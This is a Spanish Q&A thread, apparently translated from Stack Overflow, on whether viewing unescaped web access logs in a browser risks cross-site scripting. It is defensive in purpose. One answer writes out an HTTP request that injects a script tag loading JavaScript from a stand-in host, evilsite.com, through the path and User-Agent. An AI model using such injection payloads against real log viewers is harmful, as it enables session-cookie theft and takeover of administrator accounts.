1. Inicio
  2. Pregunta y respuesta
  3. ¿Es peligroso ver el registro de acceso sin desinfectar a través del navegador web?

¿Es peligroso ver el registro de acceso sin desinfectar a través del navegador web?

2009-06-26 17 views
5

¿Es peligroso ver el registro de acceso sin desinfectar a través del navegador web?¿Es peligroso ver el registro de acceso sin desinfectar a través del navegador web?

Estoy considerando registrar el registro de acceso, y estoy considerando verlo a través del navegador wev, pero si el atacante modifica su host remoto o agente de usuario o algo así, ¿puede atacarme?

Al insertar código atacante en su host remoto o agente de usuario o ect.

¿Debo desinfectarme con htmlspecialchar antes de abrir el archivo de registro de acceso a través del navegador web?

Me refiero a que el atacante inserte algún código atacante en su host remoto o agente de usuario o algo así, entonces veo ese registro de acceso a través del navegador web, y entonces mi PC se verá afectado por ese código.

Fuente

2009-06-26 jim-prove

Respuesta

3

Probablemente desee algún formato html para la salida y, por lo tanto, tenga que desinfectar/codificar los datos de registro. Pero por los argumentos sake: si envía el resultado como text/plain, el cliente no debe analizar ningún html/javascript.
P. ej. la salida de 

<?php 
header('Content-type: text/plain; charset=utf-8'); 
echo '<script>alert(document.URL);</script>';
se visualiza como 
<script>alert(document.URL);</script>
(al menos en FF3, IE8, opera, safari).

Fuente

2009-06-26 07:02:51 VolkerK

+1

sí, gracias. Entonces, mejor hago que la extensión del archivo de registro sea "txt", así que estoy a salvo. –

+0

Quiero decir que "log.txt" es seguro, pero "log.html" es un peligro. –

+0

si "log.txt" realmente es la solución ¿por qué la pregunta está etiquetada como "php php5"? – VolkerK

4

Teóricamente es posible, sí, y debe felicitarse por tener la mentalidad correcta para pensar de esa manera. Desinfectar cualquier entrada no controlada antes de mostrarlo en un navegador web siempre es una buena idea.

Me gustaría ejecutar la salida de registro a través de htmlspecialchars().

Fuente

2009-06-26 05:58:20 zombat

5

Sí, esto es peligroso.

Por ejemplo, un usuario malintencionado puede simplemente pedir algo como esto:

GET /<script src="http://www.evilsite.com/malicious.js"></script> HTTP/1.1 
Host: www.example.com 
Connection: close 
User-Agent: <script src="http://www.evilsite.com/malicious.js"></script>

y poner en peligro su página de vista con JavaScript malicioso.

Dado que probablemente esté viendo el registro en su sitio, iniciaría sesión como una cuenta con derechos administrativos. Con el JavaScript malicioso, el atacante puede robar su cookie de sesión y hacerse cargo de su sesión, completar con todas las cosas que puede hacer mientras está conectado.

Por lo tanto, en conclusión, debe definitivamente escapar páginas de registro de acceso, a menos te gusta tener tus cuentas administrativas comprometidas.

Fuente

2009-06-26 06:05:33 MiffTheFox

+0

Sí. He visto intentos de este tipo en mis registros de servidor, por lo que desinfecto los scripts antes de ver cualquier parte de ellos en una página web. –

Cuestiones relacionadas

 Cuestiones relacionadas